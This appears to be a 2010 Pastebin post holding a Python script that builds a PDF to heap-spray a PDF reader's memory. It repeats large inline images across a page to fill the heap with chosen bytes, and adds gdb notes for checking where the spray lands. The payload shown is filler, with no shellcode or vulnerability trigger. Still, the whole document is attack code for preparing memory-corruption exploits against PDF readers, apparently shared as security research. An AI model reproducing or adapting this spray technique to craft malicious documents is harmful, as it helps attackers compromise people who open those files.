Guest User

feliam

a guest
Feb 15th, 2010
776
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ##########################################################################
  2. ####   Felipe Andres Manzano     *   felipe.andres.manzano@gmail.com  ####
  3. ####   http://twitter.com/feliam *   http://wordpress.com/feliam      ####
  4. ##########################################################################
  5. ## Heap spraying PDF using inline images
  6. from miniPDF import *
  7. import zlib,sys
  8.  
  9. #This construct and add the spraying page
  10. def sprayPage(doc,pages, sc="A", size=1024*1024, N=300 , offset=0x44):
  11.     #sizes
  12.     W,H=size,1
  13.     payload = (sc*(size/len(sc)+1))[offset:W*H+offset]
  14.  
  15.     #contents
  16.     contents=  PDFStream(('''q BI /W %d /H %d /CS /G /BPC 8 ID %sEI Q '''%(W,H,payload))*N)
  17.     contents.appendFilter(FlateDecode())
  18.     doc.add(contents)
  19.  
  20.     #page
  21.     page = PDFDict()
  22.     page.add("Type",PDFName("Page"))
  23.     page.add("Resources",  PDFDict())
  24.     page.add("Contents", PDFRef(contents))
  25.  
  26.     page.add("Parent",PDFRef(pages))
  27.     doc.add(page)
  28.     return page
  29.  
  30.  
  31. #The document
  32. doc = PDFDoc()
  33.  
  34. #pages
  35. pages = PDFDict()
  36. pages.add("Type", PDFName("Pages"))
  37.  
  38. #spray! fssss fsss fssss
  39. #0x1000 <<<<AAAAAAAAA...AAAAAAAAAAA>>><<<<AAAAAAAAA...AAAAAAAAAAA>>>
  40. #0x3000 <<<<AAAAAAAAA...AAAAAAAAAAA>>><<<<AAAAAAAAA...AAAAAAAAAAA>>>
  41. spage = sprayPage(doc,pages,"<<<<"+"A"*(0x1000-8)+">>>>",0x100000-100,400,0x2c)
  42.  
  43. #the list of pages
  44. pages.add("Kids", PDFArray([PDFRef(spage)]))
  45. pages.add("Count", PDFNum(1))
  46. doc.add(pages)
  47.  
  48. #catalog
  49. catalog = PDFDict()
  50. catalog.add("Type", PDFName("Catalog"))
  51. catalog.add("Pages", PDFRef(pages))
  52. doc.add(catalog)
  53. doc.setRoot(catalog)
  54.  
  55. print doc
  56. ##gdb
  57. ##x/4x 0xb0000000 +0x1000*X
  58.  
RAW Paste Data